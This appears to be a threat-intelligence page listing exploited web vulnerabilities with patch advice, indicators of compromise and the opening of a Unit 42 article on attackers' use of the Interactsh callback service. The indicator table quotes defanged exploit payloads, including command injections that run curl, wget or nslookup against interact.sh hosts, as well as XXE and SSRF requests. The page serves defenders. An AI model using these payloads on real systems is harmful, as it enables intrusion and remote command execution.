ZeroHour

Vulnerabilities mentionedAll →

CVEVulnerabilityCVSSEPSSFlagsAffectedExposurePublished
CVE-2016-1555
Unauthenticated Command Injection RCE in NETGEAR Business Wireless Access Points

CVE-2016-1555 is a critical (CVSS 9.8) unauthenticated command injection flaw (CWE-77) in the boardData102.php, boardData103.php, boardDataJP.php, boardDataNA.php, and boardDataWW.php management pages of seven NETGEAR wireless access point models. An attacker who can reach these web endpoints over the network can pass crafted input to the scripts and execute arbitrary operating-system commands on the access point, with no login, privilege, or user interaction required. Successful exploitation grants full control of the device, letting attackers use it as a foothold or conscript it into IoT botnets such as BotenaGo, which reportedly uses 33 exploits to target millions of IoT devices. Only the NETGEAR WN604 (firmware before 3.3.3) and the WN802Tv2, WNAP210v2, WNAP320, WNDAP350, WNDAP360, and WNDAP660 (firmware before 3.5.5.0) are affected. The flaw is listed in CISA's Known Exploited Vulnerabilities catalog (added 2022-03-25), has a public proof-of-concept on Exploit-DB, and carries an EPSS score of 98.3%, so defenders should treat it as actively exploited in the wild.

Do: Upgrade the WN604 to firmware 3.3.3 or later and the WN802Tv2, WNAP210v2, WNAP320, WNDAP350, WNDAP360, and WNDAP660 to firmware 3.5.5.0 or later, per NETGEAR's instructions. Until patched, do not expose these access points' web management interface to the internet and restrict administration to a trusted management VLAN or VPN; if current firmware is no longer obtainable for a given model, consider isolating or replacing the device. Review device and web-server logs for suspicious requests to the boardData*.php endpoints as a sign of attempted or successful exploitation.

9.898% KEV PoC
  • NETGEAR WN604 wireless access point firmware before 3.3.3
  • NETGEAR WN802Tv2 wireless access point firmware before 3.5.5.0
  • NETGEAR WNAP210v2 wireless access point firmware before 3.5.5.0
  • +4 more
largeorder of tens of thousands of internet-exposed devices; total installed base unknown
CVE-2017-12629
Remote code execution occurs in Apache Solr before 7.1 with Apache Lucene before 7.1 by exploiting XXE in conjunction with use of a Config API add-listener comm

Remote code execution occurs in Apache Solr before 7.1 with Apache Lucene before 7.1 by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected versions of Solr.

NVD description · AI analysis pending
9.892% PoC ×2
  • apache solr
  • apache jboss enterprise application platform
  • apache debian linux
  • +1 more
CVE-2017-9506
The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to

The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF).

NVD description · AI analysis pending
6.172% PoC ×3
  • atlassian oauth
CVE-2018-1000600
A exposure of sensitive information vulnerability exists in Jenkins GitHub Plugin 1.29.1 and earlier in GitHubTokenCredentialsCreator.java that allows attackers

A exposure of sensitive information vulnerability exists in Jenkins GitHub Plugin 1.29.1 and earlier in GitHubTokenCredentialsCreator.java that allows attackers to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

NVD description · AI analysis pending
8.891%
  • jenkins github
CVE-2018-13354
+1 in the same advisory: …13338
System command injection in logtable.php in TerraMaster TOS version 3.1.03 allows attackers to execute system commands via the "Event" parameter.

System command injection in logtable.php in TerraMaster TOS version 3.1.03 allows attackers to execute system commands via the "Event" parameter.

NVD description · AI analysis pending
9.823% PoC
  • terra-master terramaster operating system
CVE-2018-14839
Unauthenticated Command Injection RCE in LG N1A1 NAS

LG N1A1 NAS firmware 3718.510 contains an OS command injection flaw (CWE-78) that allows an unauthenticated attacker to execute arbitrary commands on the device. The flaw is triggered over the network by sending crafted parameters in an HTTP POST request to the NAS web interface, requiring no credentials or user interaction. Successful exploitation gives the attacker remote code execution on the device, with full confidentiality, integrity, and availability impact per the critical 9.8 CVSS score. Only LG N1A1 NAS devices (specifically firmware 3718.510 per the disclosure) are affected. Exploitation is confirmed in the wild: the flaw was added to CISA's Known Exploited Vulnerabilities catalog on 2022-03-25, carries a very high 89.4% EPSS probability of exploitation within 30 days, and a public proof-of-concept write-up is available.

Do: Apply updates per LG/vendor instructions as required by CISA's KEV listing; given the device's age, if no updated firmware is obtainable, replace or isolate the NAS. Immediately check whether the N1A1 web interface is exposed to the internet (port forwarding, UPnP) and restrict HTTP access to trusted networks or a VPN. Review device logs for suspicious HTTP POST requests and unexpected commands as evidence of compromise.

9.889% KEV PoC
  • LG N1A1 NAS (firmware) 3718.510 (confirmed affected; other firmware versions not specified in available data)
nichelikely low thousands of devices at most worldwide, with only a small fraction internet-exposed (estimate; no public scan counts available)
CVE-2018-15517
The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outboun

The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, leading to SSRF, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI.

NVD description · AI analysis pending
8.644% PoC ×2
  • dlink central wifimanager
CVE-2018-16167
LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors.

LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors.

NVD description · AI analysis pending
9.875%
  • jpcert logontracer
CVE-2019-18394
A Server Side Request Forgery (SSRF) vulnerability in FaviconServlet.java in Ignite Realtime Openfire through 4.4.2 allows attackers to send arbitrary HTTP GET

A Server Side Request Forgery (SSRF) vulnerability in FaviconServlet.java in Ignite Realtime Openfire through 4.4.2 allows attackers to send arbitrary HTTP GET requests.

NVD description · AI analysis pending
9.832%
  • igniterealtime openfire
CVE-2019-2616
Unauthenticated Data Access and Tampering in Oracle BI Publisher (CVE-2019-2616)

Oracle BI Publisher (formerly XML Publisher), a component of Oracle Fusion Middleware, contains an unauthorized-access flaw in its BI Publisher Security subcomponent affecting versions 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. An unauthenticated attacker with network access can trigger it by sending crafted HTTP requests to the BI Publisher service, with no credentials or user interaction required. Successful exploitation yields unauthorized read access to a subset of BI Publisher-accessible data and unauthorized update, insert or delete access to some of that data; because the CVSS scope is 'changed,' attacks may also significantly impact additional products that depend on the component. Any organization running the affected versions — including BI Publisher embedded in other Oracle Fusion Middleware deployments — is at risk. The flaw is confirmed exploited in the wild (CISA KEV, added 2022-03-25) and carries a very high EPSS (~92%), although no public proof-of-concept is known.

Do: Apply the Oracle-provided patch per vendor instructions (this 2019 CVE was fixed in the April 2019 Oracle Critical Patch Update), updating any installation on 11.1.1.9.0, 12.2.1.3.0 or 12.2.1.4.0. As an interim mitigation, restrict HTTP access to BI Publisher interfaces to trusted networks only. Given the CISA KEV listing, prioritize patching internet-facing instances and review logs for signs of unauthorized reads or writes to BI Publisher data.

7.292% KEV
  • Oracle BI Publisher (formerly XML Publisher), component of Oracle Fusion Middleware (subcomponent: BI Publisher Security) 11.1.1.9.0, 12.2.1.3.0, 12.2.1.4.0
largetens of thousands of deployments (order-of-magnitude estimate), likely thousands directly exposed on the internet
CVE-2019-2767
Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware (subcomponent:

Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware (subcomponent: BI Publisher Security). The supported version that is affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher (formerly XML Publisher). While the vulnerability is in BI Publisher (formerly XML Publisher), attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of BI Publisher (formerly XML Publisher) accessible data as well as unauthorized read access to a subset of BI Publisher (formerly XML Publisher) accessible data. CVSS 3.0 Base Score 7.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N).

NVD description · AI analysis pending
7.25%
  • oracle bi publisher
CVE-2020-13379
The avatar feature in Grafana 3.0.1 through 7.0.1 has an SSRF Incorrect Access Control issue.

The avatar feature in Grafana 3.0.1 through 7.0.1 has an SSRF Incorrect Access Control issue. This vulnerability allows any unauthenticated user/client to make Grafana send HTTP requests to any URL and return its result to the user/client. This can be used to gain information about the network that Grafana is running on. Furthermore, passing invalid URL objects could be used for DOS'ing Grafana via SegFault.

NVD description · AI analysis pending
8.2100% PoC ×3
  • grafana grafana
  • grafana fedora
  • grafana e-series performance analyzer
  • +1 more
CVE-2020-15568
TerraMaster TOS before 4.1.29 has Invalid Parameter Checking that leads to code injection as root.

TerraMaster TOS before 4.1.29 has Invalid Parameter Checking that leads to code injection as root. This is a dynamic class method invocation vulnerability in include/exportUser.php, in which an attacker can trigger a call to the exec method with (for example) OS commands in the opt parameter.

NVD description · AI analysis pending
9.829% PoC
  • terra-master tos
CVE-2020-25223
Unauthenticated Command Injection RCE in Sophos SG UTM WebAdmin

CVE-2020-25223 is an unauthenticated OS command injection (CWE-78) in the WebAdmin management interface of Sophos SG UTM appliances. A remote attacker can trigger it by sending a crafted request to the WebAdmin service containing a malicious SID parameter, which is passed to the underlying system without proper sanitization. Successful exploitation yields remote code execution with high impact on confidentiality, integrity and availability (CVSS 3.1 score of 9.8), effectively giving the attacker control of the firewall appliance. Any organization running SG UTM versions prior to v9.705 MR5, v9.607 MR7, or v9.511 MR11 is affected, particularly where the WebAdmin interface is reachable from the internet. The flaw is being actively exploited: it was added to CISA KEV on 2022-03-25, carries a 96.7% EPSS exploitation probability, and public PoC material exists; any ransomware association is currently unknown.

Do: Upgrade SG UTM to v9.705 MR5, v9.607 MR7, or v9.511 MR11 (or later) per vendor instructions, consistent with the CISA KEV required action. Until patched, restrict WebAdmin access to trusted management networks or VPN and ensure it is not directly exposed to the internet. Review WebAdmin access logs for anomalous or crafted SID parameter requests that may indicate prior exploitation, and note that ransomware-related use of this bug has not been confirmed.

9.897% KEV PoC ×2
  • Sophos SG UTM (Unified Threat Management) - WebAdmin interface All versions before v9.705 MR5, before v9.607 MR7, and before v9.511 MR11; fixed in v9.705 MR5, v9.607 MR7, and v9.511 MR11
largeon the order of tens of thousands of internet-exposed SG UTM appliances, with a larger total installed base whose WebAdmin exposure is unknown
CVE-2020-28188
Remote Command Execution (RCE) vulnerability in TerraMaster TOS <= 4.2.06 allow remote unauthenticated attackers to inject OS commands via /include/makecvs.php

Remote Command Execution (RCE) vulnerability in TerraMaster TOS <= 4.2.06 allow remote unauthenticated attackers to inject OS commands via /include/makecvs.php in Event parameter.

NVD description · AI analysis pending
9.897% PoC ×2
  • terra-master tos
CVE-2020-28871
Remote code execution in Monitorr v1.7.6m in upload.php allows an unauthorized person to execute arbitrary code on the server-side via an insecure file upload.

Remote code execution in Monitorr v1.7.6m in upload.php allows an unauthorized person to execute arbitrary code on the server-side via an insecure file upload.

NVD description · AI analysis pending
9.886% PoC ×3
  • monitorr monitorr
CVE-2020-7247
Unauthenticated Root RCE in OpenSMTPD 6.6 (OpenBSD and Linux)

OpenSMTPD 6.6 contains a critical, unauthenticated remote code execution flaw (CWE-78) caused by an incorrect return value from input validation in smtp_mailaddr in smtp_session.c. A remote attacker triggers it during a normal SMTP session by supplying shell metacharacters in the MAIL FROM field; when OpenSMTPD runs with its default (uncommented) configuration, the unsanitized address is passed to a shell during mail delivery, executing attacker-supplied commands. Because the affected delivery path runs with root privileges, the attacker gains arbitrary command execution as root on the mail server. Affected deployments include OpenBSD 6.6, where OpenSMTPD is the default mail daemon, plus Debian, Fedora, and Ubuntu systems shipping OpenSMTPD 6.6. Exploitation is confirmed: the flaw is in CISA's Known Exploited Vulnerabilities catalog (added 2022-03-25), multiple public PoC exploits exist, and EPSS estimates a 99% probability of exploitation within 30 days.

Do: Apply vendor updates per CISA's required action: upgrade OpenSMTPD to the patched release (6.6.4p1 or later per vendor advisories) or install the OpenBSD 6.6 errata patch, and pull updated packages from Debian, Fedora, or Ubuntu. Verify your running version and whether the default (uncommented) smtpd.conf is in use; until patched, restrict access to the SMTP service from untrusted networks. Hunt for signs of compromise, such as unexpected commands or processes executed as root by smtpd.

9.899% KEV PoC ×6
  • OpenBSD OpenSMTPD 6.6 (including 6.6.1 and 6.6.2 per public exploit references); vulnerable in the default (uncommented) configuration
  • OpenBSD 6.6 (ships the affected OpenSMTPD)
  • Debian Linux releases shipping OpenSMTPD 6.6 (specific versions not specified in source data)
  • +2 more
large≈10,000–100,000 internet-exposed OpenSMTPD servers (exact count unknown)
CVE-2020-8813
graph_realtime.php in Cacti 1.2.8 allows remote attackers to execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has the graph r

graph_realtime.php in Cacti 1.2.8 allows remote attackers to execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has the graph real-time privilege.

NVD description · AI analysis pending
8.874% PoC ×4
  • cacti cacti
  • cacti fedora
  • cacti open-audit
  • +1 more
CVE-2021-27886
rakibtg Docker Dashboard before 2021-02-28 allows command injection in backend/utilities/terminal.js via shell metacharacters in the command parameter of an API

rakibtg Docker Dashboard before 2021-02-28 allows command injection in backend/utilities/terminal.js via shell metacharacters in the command parameter of an API request. NOTE: this is NOT a Docker, Inc. product.

NVD description · AI analysis pending
9.846%
  • docker dashboard project docker dashboard
CVE-2021-27905
The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is use

The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter. Prior to this bug getting fixed, it did not. This problem affects essentially all Solr versions prior to it getting fixed in 8.8.2.

NVD description · AI analysis pending
9.893%
  • apache solr
CVE-2021-31755
Unauthenticated Stack Overflow RCE in Tenda AC11 Router via /goform/setmac

Tenda AC11 routers running firmware through 02.03.01.104_CN contain a stack buffer overflow (CWE-787 out-of-bounds write) in the /goform/setmac web endpoint. An unauthenticated attacker can trigger it with a crafted HTTP POST request, overwriting stack memory and executing arbitrary code on the device. Successful exploitation yields full control of the router, enabling traffic interception, lateral movement into the attached home or small-office network, or use in botnets. All AC11 units on affected CN firmware are in scope; no other Tenda products are named in this advisory. The flaw is listed in CISA's Known Exploited Vulnerabilities catalog (added 2021-11-03), carries a very high EPSS score of 86.9%, and public proof-of-concept exploit material is available on GitHub.

Do: Upgrade AC11 firmware to a release newer than 02.03.01.104_CN per Tenda's instructions (no specific fixed version is provided in this data), as required by the CISA KEV catalog. Until patched, disable or restrict WAN-facing HTTP management and monitor for unexpected POST requests to /goform/setmac. Review whether the router is reachable from the internet, since unauthenticated network access is all an attacker needs.

9.887% KEV PoC
  • Tenda AC11 router firmware through 02.03.01.104_CN (CN firmware builds up to and including this version)
largeplausibly on the order of 100,000+ consumer deployments, with tens of thousands directly internet-exposed (estimate)
CVE-2021-32819
Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS.

Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. This issue is fixed in version 9.0.0. For complete details refer to the referenced GHSL-2021-023.

NVD description · AI analysis pending
8.858% PoC
  • squirrelly squirrelly
CVE-2021-33544
Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arb

Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.

NVD description · AI analysis pending
7.295% PoC
  • geutebrueck g-cam ebc-2110 firmware
  • geutebrueck g-cam ebc-2111 firmware
  • geutebrueck g-cam efd-2241 firmware
  • +1 more

Indicators of compromiseAll →

TypeIndicatorContext
domainc3167tzyedf0000sfc2ggbo7zoeyyyyyp.interactip-addr/search?q={!xmlparser v="<!doctype a system hxxp[:]//c3167tzyedf0000sfc2ggbo7zoeyyyyyp[.]interact.sh/solr/gettingstarted/upload?stream.body={"xx":"yy"}&com
domainc3167tzyedf0000sfc2ggboug8cyyyyyb.interactr/solr/db/replication?command=fetchindex&masterurl=hxxp[:]//c3167tzyedf0000sfc2ggboug8cyyyyyb[.]interact.sh:80/xxxx&wt=json&httpbasicauthuser=aaa&httpbasicauthpas
domainc32s61pbq16mga0vler0cdnhgbayyyyyn.interactdule.constructor._load; require('child_process').exec('curl c32s61pbq16mga0vler0cdnhgbayyyyyn[.]interact.sh'); ( CVE-2021-32819 ) hxxp[:]//ip-addr/plugins/servlet
domainc33mg9s2ndhfbpsj7legcddsomayyyypg.interactr/plugins/servlet/oauth/users/icon-uri?consumeruri=hxxp[:]//c33mg9s2ndhfbpsj7legcddsomayyyypg[.]interact.sh (CVE-2017-9506) hxxp[:]//ip-addr/index.php/system/mail
domainc37e7sraa1psb1c2nso0cd8o9eyyyn94w.interact23) hxxp[:]//ip-addr/rest/sharelinks/1.0/link?url=hxxps[:]//c37e7sraa1psb1c2nso0cd8o9eyyyn94w[.]interact.sh hxxp[:]//ip-addr/search.php?search=";wget+hxxp[:]//c4b
domainc38at9vk6tb1j2mah7i0cdeca5yyybucs.interactbin/","args":["-c","$@|sh",".","echo","nslookup","$(whoami).c38at9vk6tb1j2mah7i0cdeca5yyybucs[.]interact.sh"]}}&wt=json&isshard=true&q=apple hxxp[:]//ip-addr/sear
domainc38r5fq23aksk1ma690gcdmc6doyyahck.interact!doctype+r+[<!element+r+any+><!entity+%+sp+system+"hxxp[:]//c38r5fq23aksk1ma690gcdmc6doyyahck[.]interact.sh/xxe.xml">%sp;%param1;]>&_xf=excel&_xl=123&template=123
domainc3jrcoqkfbhrf4rcsmr0cdu5taayynuze.interactddr/avatar/test?d=redirect.rhynorater.com?;/bp.blogspot.com/c3jrcoqkfbhrf4rcsmr0cdu5taayynuze[.]interact.sh (CVE-2020-13379) hxxp[:]//ip-addr/adm/krgourl.php?docu
domainc3qsfdg4hl24te8g7rc0cd9erqyygmui6.interact-4223) hxxp[:]//ip-addr/umbraco/feedproxy.aspx?url=hxxp[:]//c3qsfdg4hl24te8g7rc0cd9erqyygmui6[.]interact.sh (CVE-2012-1301) hxxp[:]//ip-addr/getfavicon?host=hxxp[
domainc3uhg4emp8vt8fqq370gcd6th6ayyy4b6.interacth (CVE-2012-1301) hxxp[:]//ip-addr/getfavicon?host=hxxp[:]//c3uhg4emp8vt8fqq370gcd6th6ayyy4b6[.]interact.sh (CVE-2019-18394) (CVE-2020-7247) (CVE-2018-16167) (CVE
domainc44h3el4f1mfla5idm10crrtxqyyyjpp4.interactddr/api/container/command?container=&command=;curl hxxp[:]//c44h3el4f1mfla5idm10crrtxqyyyjpp4[.]interact.sh (CVE-2021-27886) hxxp[:]//ip-addr/avatar/test?d=redire
domainc44s021vkr17popa98agcrrhyneyyyd7c.interactateselfcert&local=anything&country=aa&state=$(wget hxxp[:]//c44s021vkr17popa98agcrrhyneyyyd7c[.]interact.sh)&organization=anything&organizationunit=anything&commo
domainc45luqovk0lir2vett1gcrf4iyayy468g.interact79) hxxp[:]//ip-addr/adm/krgourl.php?document_root=hxxp[:]//c45luqovk0lir2vett1gcrf4iyayy468g[.]interact.sh (CVE-2009-4223) hxxp[:]//ip-addr/umbraco/feedproxy.asp
domainc4b14uqjfg5t9muoh3pgcrca3hoyfrbcr.interactkencredentialscreator/createtokenbypassword?apiurl=hxxp[:]//c4b14uqjfg5t9muoh3pgcrca3hoyfrbcr[.]interact.sh (CVE-2018-1000600) hxxp[:]//ip-addr/xmlpserver/convert
domainc4b14uqjfg5t9muoh3pgcrcwtheyrjn8k.interacteract.sh hxxp[:]//ip-addr/search.php?search=";wget+hxxp[:]//c4b14uqjfg5t9muoh3pgcrcwtheyrjn8k[.]interact.sh';" hxxp[:]//ip-addr/index.php?plot=;wget hxxp[:]//c4bf
domainc4b14uqjfg5t9muoh3pgcrqz7oyykqcuq.interact17-9506) hxxp[:]//ip-addr/index.php/system/mailconnect/host/c4b14uqjfg5t9muoh3pgcrqz7oyykqcuq[.]interact.sh/port/80/secure (CVE-2018-15517) hxxp[:]//ip-addr/api/c
domainc4bfibtmh0e03d1t5u90crcb9fayzf9dr.interactteract.sh';" hxxp[:]//ip-addr/index.php?plot=;wget hxxp[:]//c4bfibtmh0e03d1t5u90crcb9fayzf9dr[.]interact.sh
domainc4mqgxkyedf0000ar3d0gnkmaqayyyyyb.interact.shthe page, the web UI randomly generates an Interactsh link: C4mqgxkyedf0000ar3d0gnkmaqayyyyyb[.]interact[.]sh Figure 2. Example of using Interactsh through the Web U
domaincertmngr.cgis: Exploits Leveraging Interactsh hxxp[:]//ip-addr/uapi-cgi/certmngr[.]cgi?action=createselfcert&local=anything&country=aa&state=$(w
domaininteract.shappend attacks that use Interactsh. DNS Security has marked interact[.]sh as a malicious site. We also recommend the following acti
domainredirect.rhynorater.cominteract.sh (CVE-2021-27886) hxxp[:]//ip-addr/avatar/test?d=redirect.rhynorater.com?;/bp.blogspot.com/c3jrcoqkfbhrf4rcsmr0cdu5taayynuze[.]inter
urlhttp://c3167tzyedf0000sfc2ggbo7zoeyyyyyp[hxxp[:]//ip-addr/search?q={!xmlparser v="<!doctype a system hxxp[:]//c3167tzyedf0000sfc2ggbo7zoeyyyyyp[.]interact.sh/solr/gettingstarted/upload?stream.body={"xx"
urlhttp://c38r5fq23aksk1ma690gcdmc6doyyahck["1.0"+?><!doctype+r+[<!element+r+any+><!entity+%+sp+system+"hxxp[:]//c38r5fq23aksk1ma690gcdmc6doyyahck[.]interact.sh/xxe.xml">%sp;%param1;]>&_xf=excel&_xl=123&te
urlhttp://c44h3el4f1mfla5idm10crrtxqyyyjpp4[[:]//ip-addr/api/container/command?container=&command=;curl hxxp[:]//c44h3el4f1mfla5idm10crrtxqyyyjpp4[.]interact.sh (CVE-2021-27886) hxxp[:]//ip-addr/avatar/tes
urlhttp://c44s021vkr17popa98agcrrhyneyyyd7c[ction=createselfcert&local=anything&country=aa&state=$(wget hxxp[:]//c44s021vkr17popa98agcrrhyneyyyd7c[.]interact.sh)&organization=anything&organizationunit=anyt
urlhttp://c4b14uqjfg5t9muoh3pgcrca3hoyfrbcr[]githubtokencredentialscreator/createtokenbypassword?apiurl=hxxp[:]//c4b14uqjfg5t9muoh3pgcrca3hoyfrbcr[.]interact.sh (CVE-2018-1000600) hxxp[:]//ip-addr/xmlpserv
urlhttp://c4b14uqjfg5t9muoh3pgcrcwtheyrjn8k[94w[.]interact.sh hxxp[:]//ip-addr/search.php?search=";wget+hxxp[:]//c4b14uqjfg5t9muoh3pgcrcwtheyrjn8k[.]interact.sh';" hxxp[:]//ip-addr/index.php?plot=;wget hxx
urlhttp://c4bfibtmh0e03d1t5u90crcb9fayzf9dr[jn8k[.]interact.sh';" hxxp[:]//ip-addr/index.php?plot=;wget hxxp[:]//c4bfibtmh0e03d1t5u90crcb9fayzf9dr[.]interact.sh
urlhttp://ip-addr/adm/krgourl.php?document_root=http[:oqkfbhrf4rcsmr0cdu5taayynuze[.]interact.sh (CVE-2020-13379) hxxp[:]//ip-addr/adm/krgourl.php?document_root=hxxp[:]//c45luqovk0lir2vett1gcrf4iyayy468g[.]interact.sh (CVE-20
urlhttp://ip-addr/api/container/command?container=&command=;curlcrqz7oyykqcuq[.]interact.sh/port/80/secure (CVE-2018-15517) hxxp[:]//ip-addr/api/container/command?container=&command=;curl hxxp[:]//c44h3el4f1mfla5idm10crrtxqyyyjpp4[.]interact.sh
urlhttp://ip-addr/avatar/test?d=redirect.rhynorater.com?;/bp.blogspot.com/c3jrcoqkfbhrf4rcsmr0cdu5taayynuze[el4f1mfla5idm10crrtxqyyyjpp4[.]interact.sh (CVE-2021-27886) hxxp[:]//ip-addr/avatar/test?d=redirect.rhynorater.com?;/bp.blogspot.com/c3jrcoqkfbhrf4rcsmr0cdu5taayynuze[.]interact.sh (CVE-2020-13379) hxxp[:]//ip-addr/adm/krgour
urlhttp://ip-addr/?defaultFilter=easicauthuser=aaa&httpbasicauthpassword=bbb (CVE-2021-27905) hxxp[:]//ip-addr/?defaultFilter=e')); let require = global.require || global.process.mainMo
urlhttp://ip-addr/getfavicon?host=http[:fdg4hl24te8g7rc0cd9erqyygmui6[.]interact.sh (CVE-2012-1301) hxxp[:]//ip-addr/getfavicon?host=hxxp[:]//c3uhg4emp8vt8fqq370gcd6th6ayyy4b6[.]interact.sh (CVE-20
urlhttp://ip-addr/index.php?plot=;wgethxxp[:]//c4b14uqjfg5t9muoh3pgcrcwtheyrjn8k[.]interact.sh';" hxxp[:]//ip-addr/index.php?plot=;wget hxxp[:]//c4bfibtmh0e03d1t5u90crcb9fayzf9dr[.]interact.sh
urlhttp://ip-addr/index.php/system/mailconnect/host/c4b14uqjfg5t9muoh3pgcrqz7oyykqcuq[g9s2ndhfbpsj7legcddsomayyyypg[.]interact.sh (CVE-2017-9506) hxxp[:]//ip-addr/index.php/system/mailconnect/host/c4b14uqjfg5t9muoh3pgcrqz7oyykqcuq[.]interact.sh/port/80/secure (CVE-2018-15517) hxxp[:]//ip-
urlhttp://ip-addr/plugins/servlet/oauth/users/icon-uri?consumeruri=http[:6mga0vler0cdnhgbayyyyyn[.]interact.sh'); ( CVE-2021-32819 ) hxxp[:]//ip-addr/plugins/servlet/oauth/users/icon-uri?consumeruri=hxxp[:]//c33mg9s2ndhfbpsj7legcddsomayyyypg[.]interact.sh (CVE-20
urlhttp://ip-addr/rest/sharelinks/1.0/link?url=https[:018-13338 CVE-2020-15568) (CVE-2020-28871) (CVE-2020-25223) hxxp[:]//ip-addr/rest/sharelinks/1.0/link?url=hxxps[:]//c37e7sraa1psb1c2nso0cd8o9eyyyn94w[.]interact.sh hxxp[:]
urlhttp://ip-addr/search.php?search=l=hxxps[:]//c37e7sraa1psb1c2nso0cd8o9eyyyn94w[.]interact.sh hxxp[:]//ip-addr/search.php?search=";wget+hxxp[:]//c4b14uqjfg5t9muoh3pgcrcwtheyrjn8k[.]intera
urlhttp://ip-addr/search?q={!xmlparserdeca5yyybucs[.]interact.sh"]}}&wt=json&isshard=true&q=apple hxxp[:]//ip-addr/search?q={!xmlparser v="<!doctype a system hxxp[:]//c3167tzyedf0000sfc2ggbo7zo
urlhttp://ip-addr/securityrealm/user/admin/descriptorbyname/org.jenkinsci.plugins.github.config[g&commonname=anything&days=1&type=anything (CVE-2021-33544) hxxp[:]//ip-addr/securityrealm/user/admin/descriptorbyname/org.jenkinsci.plugins.github.config[.]githubtokencredentialscreator/createtokenbypassword?apiu
urlhttp://ip-addr/solr/db/replication?command=fetchindex&masterurl=http[:m.body={"xx":"yy"}&commit=true""><a></a>"} (CVE-2017-12629) hxxp[:]//ip-addr/solr/db/replication?command=fetchindex&masterurl=hxxp[:]//c3167tzyedf0000sfc2ggboug8cyyyyyb[.]interact.sh:80/xxxx
urlhttp://ip-addr/solr/select?qt=/config#&&shards=127.0.0.1:8984/solq&stream.body={p;%param1;]>&_xf=excel&_xl=123&template=123 (CVE-2019-2767) hxxp[:]//ip-addr/solr/select?qt=/config#&&shards=127.0.0.1:8984/solq&stream.body={"add-listener":{"event":"postcommit","name":"nuclei","clas
urlhttp://ip-addr/uapi-cgi/certmngr[d above). Use Case Examples: Exploits Leveraging Interactsh hxxp[:]//ip-addr/uapi-cgi/certmngr[.]cgi?action=createselfcert&local=anything&country=aa&stat
urlhttp://ip-addr/umbraco/feedproxy.aspx?url=http[:uqovk0lir2vett1gcrf4iyayy468g[.]interact.sh (CVE-2009-4223) hxxp[:]//ip-addr/umbraco/feedproxy.aspx?url=hxxp[:]//c3qsfdg4hl24te8g7rc0cd9erqyygmui6[.]interact.sh (CVE-20
urlhttp://ip-addr/xmlpserver/convert?xml=jfg5t9muoh3pgcrca3hoyfrbcr[.]interact.sh (CVE-2018-1000600) hxxp[:]//ip-addr/xmlpserver/convert?xml=<?xml+version="1.0"+?><!doctype+r+[<!element+r+any+><!enti
Full article1,311 words · extracted from unit42.paloaltonetworks.com · click to collapse

Executive Summary

Recently, Unit 42 has observed active exploits related to an open-source service called Interactsh. This tool can generate specific domain names to help its users test whether an exploit is successful. It can be used by researchers – but also by attackers – to validate vulnerabilities via real-time monitoring on the trace path for the domain. Researchers creating a proof of concept (PoC) for an exploit can insert Interactsh to check whether the PoC is working, but the service could also be used by attackers who want to be sure an exploit is working.

This blog will first introduce the Interactsh tool and how researchers or attackers can leverage it to perform vulnerability validation. We then describe some of the many exploits in the wild leveraging this tool, and we rank the exploits we’ve observed by popularity. In addition, we analyze Interactsh activity distribution in terms of dates and location. Lastly, we have included information about the malicious payloads for your reference.

Customers with Palo Alto Networks Next-Generation Firewall are protected against benign append attacks that use Interactsh.

Interactsh Tool

Unit 42 researchers have been actively monitoring malicious activities in the wild[1][2]. Starting mid-April 2021, we noticed some exploit attempts with the same domain name but different subdomains in the malicious payload. After investigation, we found that the source is a tool that can generate specific URLs for testing on DNS queries and HTTP attempts. This tool became publicly available on April 16, 2021, and we observed the first attempts to abuse it soon after, on April 18, 2021.

Interactsh's GitHub page describes "an Open-Source Solution for Out of band Data Extraction, A tool designed to detect bugs that cause external interactions, For example - Blind SQLi, Blind CMDi, SSRF, etc."
Figure 1. Interactsh’s GitHub Page for its open-source tool.

